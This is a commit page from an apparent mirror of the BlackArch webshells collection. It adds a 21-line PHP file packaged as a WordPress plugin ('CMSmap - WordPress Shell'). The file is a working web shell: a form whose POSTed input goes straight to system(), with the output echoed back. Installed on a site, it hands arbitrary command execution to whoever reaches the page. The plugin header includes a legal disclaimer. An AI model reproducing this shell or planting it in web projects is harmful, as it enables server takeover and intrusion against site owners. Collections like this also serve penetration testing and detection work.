mirror of
https://github.com/BlackArch/webshells
synced 2024-11-24 21:03:06 +00:00
wordpress webshell php
This commit is contained in:
parent
7e7c2d7346
commit
a152ab4c44
1 changed files with 21 additions and 0 deletions
21
php/wordpress_shell.php
Normal file
21
php/wordpress_shell.php
Normal file
|
@ -0,0 +1,21 @@
|
|||
<?php
|
||||
/**
|
||||
* Plugin Name: CMSmap - WordPress Shell
|
||||
* Plugin URI: https://github.com/m7x/cmsmap/
|
||||
* Description: Simple WordPress Shell - Usage of CMSmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developer assumes no liability and is not responsible for any misuse or damage caused by this program.
|
||||
* Version: 1.0
|
||||
* Author: CMSmap
|
||||
* Author URI: https://github.com/m7x/cmsmap/
|
||||
* License: GPLv2
|
||||
*/
|
||||
|
||||
/* word press web shell */
|
||||
|
||||
?>
|
||||
<form action="" method=post>
|
||||
Command: <input name=c type=text size=100 value="<?php if (isset($_POST["c"])){print(stripslashes($_POST["c"]));} ?>">
|
||||
<input type=submit>
|
||||
</form>
|
||||
<pre>
|
||||
<?php if (isset($_POST["c"])){system(stripslashes($_POST["c"])." 2>&1");} ?>
|
||||
</pre>
|
Loading…
Reference in a new issue